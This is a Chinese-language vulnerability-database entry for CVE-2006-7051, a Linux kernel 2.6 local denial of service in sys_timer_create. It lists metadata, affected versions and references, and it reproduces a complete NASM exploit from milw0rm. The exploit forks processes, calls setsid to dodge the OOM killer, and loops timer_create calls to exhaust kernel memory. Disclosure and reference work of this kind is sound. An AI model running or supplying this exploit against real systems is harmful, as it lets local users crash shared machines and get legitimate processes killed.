Linux kernel sys_timer_create拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110023 漏洞类型 未知
发布时间 2006-04-09 更新时间 2007-02-23
CVE编号 CVE-2006-7051 CNNVD-ID CNNVD-200702-476
漏洞平台 Linux CVSS评分 4.9
|漏洞来源
https://www.exploit-db.com/exploits/1657
https://www.securityfocus.com/bid/82136
https://cxsecurity.com/issue/WLB-2007020090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-476
|漏洞详情
Linuxkernel2.6.x版本的posix-timers.c中的sys_timer_create函数允许本地用户通过创建大量的posix定时器,造成拒绝服务(内存消耗),并可能绕过内存限制或造成其他进程被杀死。这些posix定时器会配置在内存中,但是并没有被认为是进程内存的一部分。
|漏洞EXP
;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o

section .text
   global _start

count   equ     8       ; threads count - do it quicker

_start:
       mov     ebx, count
       call    create_threads
       jmp     done
_pause:
       mov     eax,29
       int     0x80
       ret
create_threads:
       mov     eax,2
       int     0x80
       test    eax,eax
       jz      consume
       dec     ebx
       test    ebx,ebx
       jnz     create_threads
       ret
consume:
setsid:         ;       so we won't get counted as one thread in oom_killer()
       xor     ebx,ebx ;       each task will have about 20 oom_score which
       mov     eax,66 ;        is less than 'init' and others
       int     0x80
       push    eax
loopek:
       mov     eax,259
       mov     ebx,0
       mov     ecx,0
       mov     edx,esp
       int     0x80
       jmp     loopek
done:
       xor     ebx,ebx
       mov     eax,1
       int     0x80

; milw0rm.com [2006-04-09]
|受影响的产品
Thomas Lange Fully Automated Installation 2.6.18 .3 Linux Linux Kernel 2.6.18 .4 Linux Linux Kernel 2.6.18.0 Linux kernel 2.6.20 .1 Linux kernel 2.6.20 Linux kernel 2.6.19 .
|参考资料

来源:XF
名称:linux-systimercreate-dos(25712)
链接:http://xforce.iss.net/xforce/xfdb/25712
来源:BUGTRAQ
名称:20060404LinuxKernelLocalDoSvulnerability.
链接:http://www.securityfocus.com/archive/1/archive/1/430278/30/5790/threaded
来源:MILW0RM
名称:1657
链接:http://www.milw0rm.com/exploits/1657
来源:SREASON
名称:2287
链接:http://securityreason.com/securityalert/2287